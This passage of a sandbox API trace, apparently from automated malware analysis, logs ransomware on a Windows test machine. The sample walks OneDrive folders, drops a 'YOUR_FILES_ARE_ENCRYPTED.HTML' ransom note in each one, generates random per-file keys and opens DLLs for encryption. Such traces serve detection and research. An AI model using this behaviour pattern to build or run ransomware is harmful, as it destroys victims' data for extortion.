returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml" [0160.460] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.460] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0160.460] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fa", cAlternateFileName="")) returned 1 [0160.460] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa") returned 74 [0160.460] GetProcessHeap () returned 0x270000 [0160.460] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.460] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa" [0160.460] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\*" [0160.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.461] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.461] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.461] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.461] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.461] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.461] lstrlenW (lpString=".mui") returned 4 [0160.461] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.461] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.461] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.461] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0160.462] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.465] CloseHandle (hObject=0x5ac) returned 1 [0160.465] GetProcessHeap () returned 0x270000 [0160.466] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.474] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fi", cAlternateFileName="")) returned 1 [0160.474] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi") returned 74 [0160.474] GetProcessHeap () returned 0x270000 [0160.474] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.474] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi" [0160.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\*" [0160.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.477] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.477] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.477] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.477] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.477] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.477] lstrlenW (lpString=".mui") returned 4 [0160.477] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.477] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.478] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.478] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0160.478] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.484] CloseHandle (hObject=0x5ac) returned 1 [0160.484] GetProcessHeap () returned 0x270000 [0160.485] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.485] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fil-ph", cAlternateFileName="")) returned 1 [0160.485] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph") returned 78 [0160.485] GetProcessHeap () returned 0x270000 [0160.485] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.485] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph" [0160.485] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\*" [0160.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.486] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.486] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.486] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\FileSync.LocalizedResources.dll.mui") returned 114 [0160.486] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.486] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.486] lstrlenW (lpString=".mui") returned 4 [0160.486] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.486] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.486] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.486] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0160.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fil-ph\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0160.487] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.489] CloseHandle (hObject=0x5ac) returned 1 [0160.489] GetProcessHeap () returned 0x270000 [0160.490] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.490] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3f03090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3f03090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3f03090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0160.490] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll") returned 103 [0160.490] lstrcmpW (lpString1="FileSync.LocalizedResources.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.490] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0160.490] lstrlenW (lpString=".dll") returned 4 [0160.490] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0160.490] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0160.491] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=71336) returned 1 [0160.491] GetProcessHeap () returned 0x270000 [0160.491] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0160.493] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="13") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="3F") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="23") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="20") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="60") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="66") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="40") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="C4") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="58") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="9B") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="21") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="F8") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="42") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="48") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="B0") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="1D") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="DA") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="E4") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="D1") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="4F") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="EF") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="E2") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="89") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="CE") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="6D") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="9F") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="D2") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="A5") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="79") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="34") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="32") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="37") returned 2 [0160.494] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll" [0160.494] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.494] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0160.494] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3f9b610, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3f9b610, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3f9b610, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2524a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0160.495] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll") returned 94 [0160.495] lstrcmpW (lpString1="FileSync.Resources.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.495] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0160.495] lstrlenW (lpString=".dll") returned 4 [0160.495] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0160.495] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0160.495] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=2434216) returned 1 [0160.495] GetProcessHeap () returned 0x270000 [0160.495] 